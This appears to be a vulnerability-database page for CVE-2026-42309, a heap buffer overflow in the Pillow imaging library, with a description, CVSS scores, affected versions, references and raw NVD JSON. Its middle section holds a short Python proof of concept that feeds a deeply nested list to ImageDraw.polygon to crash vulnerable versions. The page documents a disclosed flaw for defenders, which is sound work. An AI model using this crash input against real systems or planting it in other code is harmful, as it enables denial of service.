CVE-2026-42309

Description

Pillow is a Python imaging library. From version 11.2.1 to before version 12.2.0, passing nested lists as coordinates to APIs that accept coordinates such as ImagePath.Path, ImageDraw.ImageDraw.polygon and ImageDraw.ImageDraw.line could cause a heap buffer overflow, as nested lists were recursively unpacked beyond the allocated buffer. Coordinate lists are now validated to contain exactly two numeric coordinates. This issue has been patched in version 12.2.0.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:python:pillow:*:*:*:*:*:*:*:* - VULNERABLE

Pillow >= 11.2.1, < 12.2.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-42309 Pillow Heap Buffer Overflow
# This script attempts to trigger the vulnerability by passing nested lists to drawing functions.
from PIL import Image, ImageDraw

# Create a blank image
img = Image.new('RGB', (100, 100), 'white')
draw = ImageDraw.Draw(img)

# Vulnerability: Passing nested lists instead of flat coordinate tuples
# The library attempts to recursively unpack these, leading to heap overflow.
malicious_coords = [[[[[10, 10]]]]] # Deeply nested list

try:
    print("Attempting to trigger vulnerability via ImageDraw.polygon...")
    # This should cause a crash or undefined behavior in vulnerable versions
    draw.polygon(malicious_coords, fill='red')
    print("Execution completed (System might be patched).")
except Exception as e:
    print(f"Exception caught: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42309
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42309
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42309/
[4] VulDB https://vuldb.com/cve/CVE-2026-42309
[5] https://github.com/python-pillow/Pillow/releases/tag/12.2.0
[6] https://github.com/python-pillow/Pillow/security/advisories/GHSA-5xmw-vc9v-4wf2

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42309", "sourceIdentifier": "[email protected]", "published": "2026-05-09T06:16:10.073", "lastModified": "2026-05-12T17:57:24.467", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Pillow is a Python imaging library. From version 11.2.1 to before version 12.2.0, passing nested lists as coordinates to APIs that accept coordinates such as ImagePath.Path, ImageDraw.ImageDraw.polygon and ImageDraw.ImageDraw.line could cause a heap buffer overflow, as nested lists were recursively unpacked beyond the allocated buffer. Coordinate lists are now validated to contain exactly two numeric coordinates. This issue has been patched in version 12.2.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:python:pillow:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.2.1", "versionEndExcluding": "12.2.0", "matchCriteriaId": "94879EF8-8971-458B-BC9B-035A7C34A8FD"}]}]}], "references": [{"url": "https://github.com/python-pillow/Pillow/releases/tag/12.2.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-5xmw-vc9v-4wf2", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}